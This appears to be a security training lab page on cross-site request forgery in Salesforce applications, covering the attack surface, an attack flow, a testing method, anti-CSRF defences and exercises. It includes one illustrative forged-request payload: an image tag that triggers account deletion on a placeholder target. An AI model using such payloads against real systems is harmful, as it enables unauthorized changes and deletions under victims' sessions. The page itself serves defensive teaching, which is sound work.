Cross-site Request Forgery (CSRF)

This lab covers how CSRF applies to Salesforce web flows, how to verify exploitability against state-changing operations, and how to implement durable anti-CSRF controls.

Executive Summary

CSRF forces an authenticated user to perform an unintended action. In Salesforce-centric applications, risk appears when custom endpoints or UI actions rely only on session cookies and do not strongly verify request intent and origin.

Salesforce Attack Surface

  • Custom Visualforce actions that mutate state
  • Apex endpoints invoked from browser context without anti-CSRF defenses
  • GET handlers performing destructive or business-critical operations
  • Custom authentication/profile update workflows lacking intent validation
  • Cross-origin callable interfaces with weak origin controls

Business Impact

  • Unauthorized changes: record creation, updates, and deletion under victim session
  • Workflow abuse: unapproved approvals, assignments, or lifecycle changes
  • Security posture degradation: user settings altered without consent
  • Fraud and integrity risk: business operations manipulated silently

Attack Flows

Representative CSRF chain:

  • Victim remains authenticated in Salesforce session
  • Victim visits attacker-controlled page
  • Browser auto-submits forged request to trusted endpoint
  • Server processes request as legitimate user action
<!-- Illustrative forced request pattern -->
<img src="https://target.example/apex/DeleteAccount?id=001xx000003DGbQ" />

Testing Methodology

  • Inventory all state-changing operations and verb usage
  • Validate anti-CSRF token presence, integrity, and one-time semantics
  • Attempt cross-origin trigger using controlled external page
  • Assess Origin/Referer policy enforcement and failure behavior
  • Confirm exploitability with reproducible state change evidence

Secure Engineering Patterns

  • Require anti-CSRF tokens for all state-changing operations
  • Reject destructive actions over GET
  • Enforce strict Origin/Referer validation in custom endpoints
  • Use SameSite cookie strategy aligned with application flow
  • Implement explicit user-intent confirmation for sensitive actions

Verification Checklist

  • All state mutations protected with anti-CSRF controls
  • No business-critical mutation exposed via GET
  • Cross-origin forged requests consistently rejected
  • Token replay and missing-token scenarios blocked
  • Regression tests confirm protections across browsers and devices

Lab Exercises

This lab includes hands-on exercises to practice identifying and fixing CSRF vulnerabilities in Salesforce workflows:

  • Exercise 1: Enumerate mutation endpoints and trust assumptions
  • Exercise 2: Execute controlled CSRF PoC against vulnerable flow
  • Exercise 3: Implement anti-CSRF token and origin validation
  • Exercise 4: Re-test cross-origin attack attempts
  • Exercise 5: Build regression checklist and evidence report
Start Lab Back to Labs